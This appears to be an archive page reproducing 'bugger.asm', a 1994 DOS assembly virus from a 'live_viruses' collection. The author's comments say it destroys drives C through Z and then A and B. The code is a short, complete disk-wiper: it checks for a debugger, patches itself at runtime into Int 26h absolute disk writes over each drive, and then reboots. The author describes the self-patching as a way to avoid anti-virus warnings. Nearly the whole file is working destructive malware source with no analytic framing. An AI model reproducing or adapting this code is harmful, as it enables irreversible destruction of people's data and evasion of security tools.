home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
The Unsorted BBS Collection
/
thegreatunsorted.tar
/
thegreatunsorted
/
live_viruses
/
virus_collections
/
bugger.asm
< prev
next >
Wrap
Assembly Source File
|
1994-05-09
|
834b
|
37 lines
; Bugger. 1994. Code by MASTERMiND
;
; It's a very simple code. All it does is screw your drives C to Z then
; at the very end the A and B drives. I relocated the Int 26 because the
; annoying Thunderbyte Anit-Virus kept nagging about not writing to disk by
; DOS. Well, here ya go... took me 10 minutes to write the code, and 1
; hour writing this stupid text....
Int 3h
Jz If_Not_In_Debug
Reboot:
Db 'Ω',00h,00h,' ' ; the 'Ω' represents EAh, the the ' ' represents FFh,FFh
If_Not_In_Debug:
Mov Si,2h
Mov Cx,0ffh
Mov Dx,0h
Mov Word Ptr [Pointer_1],26CDh
Lop:
Mov Ax,Si
Pointer_1:
Jmp Pointer_1
Inc Si
Cmp Si,26
Je Last_Two
Jmp Lop
Last_Two:
Mov Ax,0h
Mov Word Ptr [Pointer_2],26CDh
Pointer_2:
Jmp Pointer_2
Mov Ax,1h
Mov Word Ptr [Pointer_3],26CDh
Pointer_3:
Jmp Pointer_3
Jmp Reboot